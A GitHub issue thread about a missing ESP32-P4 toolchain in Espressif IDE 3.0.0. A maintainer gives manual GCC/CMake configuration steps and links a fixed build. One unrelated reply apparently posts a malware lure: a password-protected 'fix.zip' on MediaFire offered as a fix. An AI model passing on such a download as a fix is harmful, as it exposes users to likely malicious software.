espressif/idf-eclipse-plugin #1037: espressif IDE 3.0.0 win 32x86 Version 5.3 toolchain issue

rsindustries, 2024-08-26:
I checked now the espressif ide with the Version v5.3 for development of ESP32-p4 I can see that it installed everything, but when I try to compile, there is no toolchain installed, have you ever had this problem? I tested with esp-p4 function- ev board. Demo works fine, it also detects the serial port. Today when I try to open the ide, it tells me that its not able to open the shared lib, two days ago it worked fine. Do you have a workaround for that?

I tried also to install this via eclipse plugin, works fine but when I try to create a new Espressif IDF Project, this part is not visible, here I would need also support from your side. (https://github.com/espressif/idf-eclipse-plugin/blob/master/README.md) I used this to install.

qlqw233, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

sigmaaa, 2024-08-27:
Hi @rsindustries,
the esp32-p4 target is not yet added to the espressif-ide, but will be added in the next release. 
For now, you can add it manually by following these steps:
1. Open Eclipse preferences and go to the C/C++ -> Core Build Toolchains -> in the group "User defined toolchains" click "add".
2. Select GCC and provide the path to the GCC executable (in my case gcc path is: ```C:\Users\Denys\.espressif\tools\riscv32-esp-elf\esp-13.2.0_20240530\riscv32-esp-elf\bin\riscv32-esp-elf-gcc.exe```, here is an example:
[image]
3. Then go to the C/C++ Cmake, click add, and provide the path to the cmake file, which is located in the esp-idf folder:
"{PATH_TO_ESP_IDF}\esp-idf-v5.3\tools\cmake\toolchain-esp32p4.cmake". In the combo box select esp-p4 toolchain
[image]

4.  Now add esp32p4 target to the target list:
[image]
[image]

sigmaaa, 2024-08-27:
Hi @rsindustries,

I've also created a PR. Once it's built, I'll provide the Espressif-IDE and update site to you so you can try it without following the steps I provided earlier. https://github.com/espressif/idf-eclipse-plugin/pull/1038

sigmaaa, 2024-08-27:
here down below the  update site and  the espressif-ide with related PR can be found 
https://github.com/espressif/idf-eclipse-plugin/actions/runs/10574801124?pr=1038

rsindustries, 2024-09-12:
Awesome thanks a lot for the support!

closed 2024-09-26 by alirana01